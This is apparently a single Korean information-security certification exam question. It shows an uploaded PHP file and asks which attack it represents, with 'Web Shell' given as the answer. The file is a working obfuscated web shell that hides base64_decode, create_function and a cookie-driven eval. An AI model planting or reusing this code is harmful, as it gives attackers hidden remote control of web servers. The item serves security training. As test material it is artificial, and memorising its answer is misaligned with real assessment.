정보보안기사 필기 · 2024년 4회 · 3번

Q.3202441과목 · 시스템 보안

홈페이지 게시판을 통해서 아래와 같은 코드가 업로드되었다. 어떤 공격으로 의심되는가?

root@kali:~# cat test.php
<?php
$xsbw = str_replace("f","","fstfrf_rfepflfafcfe");
$tfem="sIGpvaWeo4oYXJeoyeoYeoXlfc2xpY2UoeoJGEsJGMoJGEpLTMpeoKS
kpKTtlY2heovICc8LyceoueoJGsuJz4nO30=";
$ldkx="eowcmVnX3JeolcGxhY2UoYXJyYXkoJyeo9bXlx3PVxzXS8nLeoCcvXH
MeovJyksIGFycmF5KCeocnLCcrJyk";
$mxzo="JGM9J2NvdW50JeozskeoYT0kXeo0NPeoT0eotJRTtpZihyZXNldCgkY
Skeo9PSeocxMicgJiYgeoJeoGMoJGEpP";
$zgwx="eojMpeyReorPSczNeoCc7ZWNobyeoAnPCcuJGsuJz4eonO2V2YWwoeo
YeomFzZTY0Xeo2RlY29kZSh";
$anlz = $xsbw("p", "", "baspe6p4p_pdpepcpopdpe");
$nenu = $xsbw("iv","","ivcreivativeiv_fivuivnivcivtiivon");
$olkw = $nenu('', $anlz($xsbw("eo", "", $mxzo.$zgwx.$ldkx.$tfe
m))); $olkw();
  • 1Command Injection
  • 2SQL Injection
  • 3Web Shell
  • 4Code Injection

정답: 3 · Web Shell

해설
해설 불러오는 중…
이 회차 문제 풀어보기 →정보보안기사 필기 더 풀기